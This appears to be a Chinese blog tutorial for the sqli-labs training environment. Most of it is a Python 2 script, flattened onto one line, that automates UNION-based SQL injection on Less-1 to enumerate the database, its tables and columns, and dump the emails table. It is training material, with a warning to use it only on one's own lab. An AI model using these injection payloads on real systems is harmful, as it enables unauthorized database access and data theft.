實驗環境：CentOS + Apache + sqli-labs，可從 https://github.com/Audi-1/sqli-labs 下載。注意：下面腳本發出的每一個請求都是注入攻擊載荷，只能對自己搭建的靶機使用。
利用 Python 腳本實現自動化測試 SQL 注入，當然腳本有很多不足的地方，比如不熟悉正則表達式（這玩意咱學都學不會）、腳本不夠規範等。以下爲 Less-1 的腳本：
#!/usr/bin/env python #coding=utf-8 import requests import re,time url = "http://192.168.32.142/sqli/Less-1/" db_length = 0 #判定回顯位 for i in range(1,20): payload ="?id=1' order by %d--+" %i r = requests.get(url+payload) if "Unknown column" in r.text: db_length = i print ('當前回顯位爲:%d' %db_length) break #判定數據庫版本號與名稱 payload = "?id=-1' UNION SELECT 1,version(),database()--+" r = requests.get(url+payload) if "Your Login name" and "Your Password" in r.text: v = re.search(r'Your Login name.+\d',r.text) db_version=str(v.group().split(':')[1]) db = re.search(r'Your Password.\w+',r.text) db_name = str(db.group().split(':')[1]) print ('MySQL數據庫版本: %s' %db_version) print ('數據庫名稱爲: %s' %db_name) print "開始猜測表名......" time.sleep(2) payload = ("id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s'--+") %db_name r = requests.get(url,payload) if "Your Password" in r.text: tb = ','.join(re.findall(r'Password:(.*?)</font>',r.text)) tb_name=str(tb).split(',') for i in range(len(tb_name)): print ('數據庫%s第%d張表名:' %(db_name,i)) + tb_name[i] print '*'*60 for i in tb_name: print ("開始猜測表%s下的所列名..." %i) time.sleep(2) payload = ("id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s'--+") %i r = requests.get(url,payload) if "Your Password" in r.text: em = ','.join(re.findall(r'Password:(.*?)</font>',r.text)) em_name = str(em).split(',') for k in range(len(em_name)): print ("表%s第%d列的名稱是:" %(i,k)) + em_name[k] print '-'*60 print '*'*60 print "開始猜測表emails下的所內容..." time.sleep(2) payload = "id=-1' union select 1,2,group_concat(id,'-->',email_id) from security.emails--+" r=requests.get(url,payload) if "Your Password" in r.text: name = ','.join(re.findall(r"Password:(.*?)</font>",r.text)) name= str(name).split(',') for i in range(len(name)): print("Emails表的第%d數據是:" %i) + name[i]
以下爲運行腳本的結果，速度還是可以的，哈哈哈